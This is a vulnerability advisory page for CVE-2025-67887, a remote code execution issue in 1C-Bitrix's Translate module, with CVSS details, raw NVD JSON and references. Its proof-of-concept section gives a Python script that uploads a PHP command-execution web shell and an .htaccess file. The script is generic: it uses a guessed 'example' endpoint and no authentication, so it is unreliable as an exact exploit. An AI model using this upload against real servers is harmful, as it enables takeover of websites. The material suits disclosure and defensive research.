Security Vulnerability Report
中文
CVE-2025-67887 CVSS 9.8 CRITICAL

CVE-2025-67887

Published: 2026-05-08 07:16:28
Last Modified: 2026-05-11 20:25:41

Description

1C-Bitrix through 25.100.500 allows Remote Code Execution because an actor with SOURCE/WRITE permissions for the Translate Module can upload and execute code by sending a PHP file and a .htaccess file. NOTE: this is disputed by the Supplier because this is intended behavior for the high-privileged users who can upload new translated pages to the website.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

1C-Bitrix <= 25.100.500

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://target.com/bitrix/tools/translate_upload.php" # Example endpoint shell_name = "rce_shell.php" # Malicious PHP code to execute system commands php_payload = "<?php system($_GET['cmd']); ?>" # .htaccess content to allow PHP execution in upload directory htaccess_content = "Options +ExecCGI\nAddType application/x-httpd-php .php" # Prepare files for upload files = { 'phpfile': (shell_name, php_payload, 'application/x-httpd-php'), 'htaccess': ('.htaccess', htaccess_content, 'text/plain') } # Send upload request try: response = requests.post(target_url, files=files) if response.status_code == 200: print("[+] Files uploaded successfully.") print(f"[+] Check your shell at: /upload/{shell_name}?cmd=whoami") else: print("[-] Upload failed.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67887", "sourceIdentifier": "[email protected]", "published": "2026-05-08T07:16:28.350", "lastModified": "2026-05-11T20:25:40.910", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "1C-Bitrix through 25.100.500 allows Remote Code Execution because an actor with SOURCE/WRITE permissions for the Translate Module can upload and execute code by sending a PHP file and a .htaccess file. NOTE: this is disputed by the Supplier because this is intended behavior for the high-privileged users who can upload new translated pages to the website."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://dev.1c-bitrix.ru/api_help/translate/index.php", "source": "[email protected]"}, {"url": "https://dev.1c-bitrix.ru/learning/course/?COURSE_ID=43&LESSON_ID=3055", "source": "[email protected]"}, {"url": "https://karmainsecurity.com/pocs/CVE-2025-67887.php", "source": "[email protected]"}, {"url": "https://seclists.org/fulldisclosure/2025/Dec/22", "source": "[email protected]"}, {"url": "https://www.1c-bitrix.ru/support/index.php", "source": "[email protected]"}, {"url": "http://seclists.org/fulldisclosure/2025/Dec/22", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://karmainsecurity.com/pocs/CVE-2025-67887.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}